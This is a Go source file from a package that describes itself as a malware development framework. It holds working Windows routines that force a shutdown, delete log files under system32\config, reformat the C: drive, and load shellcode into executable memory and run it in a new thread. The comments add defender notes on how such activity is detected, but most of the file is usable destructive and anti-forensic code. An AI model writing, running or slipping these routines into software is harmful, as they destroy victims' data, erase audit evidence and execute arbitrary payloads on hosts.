// Package coldfire is a framework that provides functions
// for malware development that are mostly compatible with
// Linux and Windows operating systems.
package coldfire
import (
"os"
"syscall"
"unsafe"
)
// shutdown asks the host to power off after a 60-second delay by running
// `shutdown -s -t 60` through cmdOut. The command's output is discarded;
// only cmdOut's error, if any, is returned.
func shutdown() error {
	_, err := cmdOut("shutdown -s -t 60")
	return err
}
// clearLogs runs a recursive, forced, quiet `del *log /a /s /q /f` through
// cmdOut and returns cmdOut's error, if any. The command's output is discarded.
//
// Before that it calls os.Chdir with the literal string
// "%windir%\system32\config". The error from os.Chdir is discarded, so if the
// directory change does not succeed the del command runs in whatever the
// process's current working directory happens to be at that moment.
//
// Defender note: a non-interactive process spawning del against
// system32\config is a log-/artifact-tampering indicator; process
// command-line telemetry (e.g. Sysmon/EDR process-creation events) will
// surface this invocation verbatim.
func clearLogs() error {
	os.Chdir("%windir%\\system32\\config")
	_, err := cmdOut("del *log /a /s /q /f")
	if err != nil {
		return err
	}
	return nil
}
// wipe runs `format c: /fs:ntfs` through cmdOut, i.e. it asks Windows to
// reformat the C: volume as NTFS. This is irreversibly destructive to the
// host. The command's output is discarded; only cmdOut's error is returned.
//
// Defender note: the format utility being launched by a non-interactive
// parent process is a high-fidelity signal for destructive-payload
// detection and should be alerted on from process-creation telemetry.
func wipe() error {
	cmd := "format c: /fs:ntfs"
	_, err := cmdOut(cmd)
	if err != nil {
		return err
	}
	return nil
}
// runShellcode copies sc into freshly allocated executable memory and starts
// a thread at that address. It returns nothing: every Win32 call result is
// discarded, so failures (a zero address from VirtualAlloc, an invalid handle
// from CreateThread, a wait error) are never reported to the caller.
//
// Parameters:
//   - sc: the bytes to copy into the allocation and execute.
//   - bg: selects the CreateThread creation flag: 0 when false, 0x4 when true
//     (0x4 is CREATE_SUSPENDED in the Win32 API).
//
// Steps, as written:
//   - kernel32.dll is loaded and VirtualAlloc, CreateThread and
//     WaitForSingleObject are resolved; the Must* variants panic on failure.
//   - VirtualAlloc(NULL, len(sc), 0x2000|0x1000, PAGE_EXECUTE_READWRITE):
//     0x2000|0x1000 is MEM_COMMIT|MEM_RESERVE, so the region is reserved and
//     committed in one call and is writable and executable simultaneously.
//   - The returned address is reinterpreted as a fixed *[990000]byte array and
//     sc is copied byte by byte. That array bound is unrelated to len(sc): an
//     sc longer than 990000 bytes indexes past it and panics, and a zero
//     address (allocation failure) is dereferenced without any check.
//   - CreateThread(NULL, 0, addr, NULL, bg_run, NULL) creates the thread with
//     addr as its start routine, then WaitForSingleObject is called on the
//     handle with timeout uintptr(^uint(0)) (all bits set; the DWORD
//     parameter sees 0xFFFFFFFF, INFINITE).
//
// Defender note: an RWX VirtualAlloc followed by CreateThread pointing into
// that region, from memory not backed by an image on disk, is the canonical
// in-memory loader sequence that memory-scanning and ETW/EDR rules are built
// to detect.
func runShellcode(sc []byte, bg bool) {
	var bg_run uintptr = 0x00
	if bg {
		bg_run = 0x00000004
	}
	kernel32 := syscall.MustLoadDLL("kernel32.dll")
	VirtualAlloc := kernel32.MustFindProc("VirtualAlloc")
	procCreateThread := kernel32.MustFindProc("CreateThread")
	waitForSingleObject := kernel32.MustFindProc("WaitForSingleObject")
	addr, _, _ := VirtualAlloc.Call(0, uintptr(len(sc)), 0x2000|0x1000, syscall.PAGE_EXECUTE_READWRITE)
	ptr := (*[990000]byte)(unsafe.Pointer(addr))
	for i, value := range sc {
		ptr[i] = value
	}
	threadHandle, _, _ := procCreateThread.Call(0, 0, addr, 0, bg_run, 0)
	waitForSingleObject.Call(threadHandle, uintptr(^uint(0)))
}